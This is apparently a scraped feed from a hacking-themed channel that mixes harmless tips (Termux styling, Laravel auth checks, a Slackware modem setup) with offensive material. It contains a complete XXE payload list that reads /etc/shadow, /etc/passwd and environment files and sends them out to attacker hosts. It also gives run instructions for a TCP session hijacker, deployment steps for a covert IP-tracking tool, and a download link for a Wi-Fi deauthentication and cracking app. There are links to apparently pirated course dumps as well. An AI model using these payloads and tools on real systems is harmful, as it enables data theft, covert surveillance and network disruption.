▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑This plugin for Termux provides

1) beautiful color schemes

2) powerline-ready fonts to customize the appearance of the terminal.

> Long-press anywhere on the Termux terminal and use the "Style" menu entry to use after installation

🦑DOWNLOAD:

https://f-droid.org/packages/com.termux.styling/

https://f-droid.org/repo/com.termux.styling_28.apk
Download : https://f-droid.org/packages/com.termux.styling/

That's it🤠
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑tcp connection hijacker, rust rewrite of shijack :

This was written for TAMUctf 2018, brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated, there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done, then inject a tcp packet into the telnet connection:

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/kpcyrd/rshijack.git

2) cd rshijack

3) Docker
If needed, rshijack can be pulled as a docker image. The image is currently about 10.2MB.

docker run -it --init --rm --net=host kpcyrd/rshijack eth0 172.16.13.20:37386 172.16.13.19:23

4) The way this works is by sniffing for a packet of a specific connection, then read the SEQ and ACK fields. Using that information, it's possible to send a packet on a raw socket that is accepted by the remote server as valid.

✅git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WANT TO KNOW WHO IS ON YOUR WIFI ?

BEST APPS:

https://play.google.com/store/apps/details?id=com.etwok.netspotapp

https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&hl=en

https://play.google.com/store/apps/details?id=org.speedspot.wififinder&hl=en

https://play.google.com/store/apps/details?id=com.overlook.android.fing&hl=en

https://play.google.com/store/apps/details?id=com.northbridge.wifisignalstrength

https://play.google.com/store/apps/details?id=lksystems.wifiintruder&hl=en

https://play.google.com/store/apps/details?id=de.android.telnet

https://play.google.com/store/apps/details?id=com.staircase3.opensignal&hl=en

https://play.google.com/store/apps/details?id=com.etwok.netspotapp

ENJOY ❤️👍🏻
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Determining if the Current User is Authenticated :
#ProTips

1) Use Auth::check().

The Auth::check() method returns true or false.

if (Auth::check())
{
echo "Yay! You're logged in.";
}

2) Several things happen behind the scenes when you do this.

> First Laravel checks if the current session has the id of a user. If so, then an attempt is made to retrieve the user from the database.

3) If that fails, then Laravel checks for the “remember me” cookie. If that’s present then once again an attempt is made to retrieve the user from the database.

4) Only if a valid user is retrieved from the database is true returned.

5) The ‘guest’ filter uses this method
Laravel provides a default implementation of the guest filter in app/filters.php.

Route::filter('guest', function()
{
if (Auth::check()) return Redirect::to('/');
});

6) This default implementation is used when you want to add a filter to a route that is only accessible by guests (aka users who are not logged in). If a user is logged in then they are redirected to the home page.

Unixforu
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Learn Figma https://mega.nz/#F!yosQVKaQ!3pgT9QM0rCRdDVLkCyA1Xg

Javascript 17 gb. https://mega.nz/folder/WXxjXIYA#xvZf40EVxWV7ls9UnzHTQA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑XXE PAYLOADS LIST :


--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

## External dtd: ##

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

## External dtd: ##

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------

<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>
## External dtd: ##

<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;


-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

## External dtd: ##

<!ENTITY all "%start;%stuff;%end;">

------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

## External dtd: ##

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

-------------------------^ you might need to encode this % (depends on your target) as: &#x25;

--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>


## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>


---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

source https://gist.github.com/staaldraad/01415b990939494879b4
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME IP HACKING-TRACKING :

F E A T U R E S :

Very high configurable tracking image generation
Tracking links generation
Tracking hided and not recognizable from the target point of view
Integrated Dashboard
Self-tracking prevention
Possibility to stop and start the tracking at any time
Possibility to hide the Dashboard and protect its access with a password
Live tracking reports from the Dashboard
Tracking reports live delivered to a configurable mail address
Different IP analysis services
User-Agent analysis service
Integrate URL shortening service
AllInOne PHP file
No need for a Database
Open Source

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) clone https://github.com/damianofalcioni/IP-Biter

Deploy IP-Biter

2) Copy ipb.php in your PHP server and optionally create a .htaccess file as described in the next security notes

3) Some configurable parameters are available in the firsts uncommented PHP lines of the ipb.php file, identified by the comment "START CONFIGURATION SECTION"

4) Access the Dashboard

5) Access the dashboard through ipb.php?op=$dashboardPage (or through ipb.php if $dashboardPage=='')
If $dashboardPageSecret!='' then a login page will appear asking for the $dashboardPageSecret value

6) Create a new configuration

7) When the dashboard is opened without parameters, a new configuration is created

8) Another empty new configuration can be generate clicking the "New" button

9) Configure the tracking image and the advanced setting if needed

10) It is possible to left the original image url empty. In this case an empty image will be used.

12) Add tracking links if needed

13) It is possible to left the original link empty. In this case the link will generate a 404 page.

14) Save the configuration

15) Distribute the generated image or the links to start the tracking

16) You can click the copy button and paste in a html rich email editor like gmail

NOTE: If you try to open the generated image or links but have in the same browser the dashboard page opened and loaded, your request will not be tracked (self-tracking prevention feature)

17) Load an existing configuration

18) When the dashboard is opened with the parameter "uuid", the associated configuration is loaded

19) Another configuration can be loaded pasting the "Track UUID" in the dashboard relative field and clicking the "Load" button

20) The reports will be automatically visualized in the "Tracking Reports" section of the dashboard

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Detailed fresh Proxies List

https://pastebin.com/9hy2B7Px

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑APK 2020 hacking update all in one :

Information Gathering
View a list of access points and stations (clients) around you (even hidden ones)
View the activity of a specific network (by measuring beacons and data packets) and its clients
Statistics about access points and stations
See the manufacturer of a device (AP or station) from the OUI database
See the signal power of devices and filter the ones that are closer to you
Save captured packets in .cap file
Attacks
Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)
Deauthenticate a specific client from the network it's connected
MDK3 Beacon Flooding with custom options and SSID list
MDK3 Authentication DoS for a specific network or to every nearby AP
Capture a WPA handshake or gather IVs to crack a WEP network
Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
Other
Leave the app running in the background, optionally with a notification
Copy commands or MAC addresses to clipboard
Includes the required tools, no need for manual installation
Includes the Nexmon driver, required library and management utility for BCM4339 and BCM4358 devices
Set commands to enable and disable monitor mode automatically
Crack .cap files with a custom wordlist
Create custom actions and run them on an access point or a client easily
Sort and filter Access Points and Stations with many parameters
Export all gathered information to a file
Add a persistent alias to a device (by MAC) for easier identification

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

DOWNLOAD THIS APK

https://github.com/chrisk44/Hijacker/releases/download/v1.5-beta.12/Hijacker-release-v1.5-beta.12.apk

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑use Python and SQLite To create a CRUD Contacts Database App with


https://mega.nz/folder/3hhnUIqJ#HtJc2RnXyLs0ZCWym5_eKA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 I want to set my Slackware Linux as a server, so that others can connect to my Linux host via modem dial-up. What should I do? Especially how to make my modem answer the dial?

1) Add this line in /etc/inittab:
d1:345:respawn:/sbin/agetty -mt60 38400,19200,9600,2400,1200 ttyS1
(assuming your modem is on the second serial port)
Note that the redhat is The mingetty cannot be used for this purpose, you can
download mgetty from freesoft.cei.gov.cn to use.

2) if you have the modem will switch you can set it to answer calls, if there is no switch
to check its manual to find out what is AT command set (I do not have modem manual)
to set up this command in / etc /rc.d/rc.local will do.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Comptia Security+ Full Course

https://drive.google.com/open?id=1EPG_Dtzs7F0zWEvWkDJat7umvxWGdHwC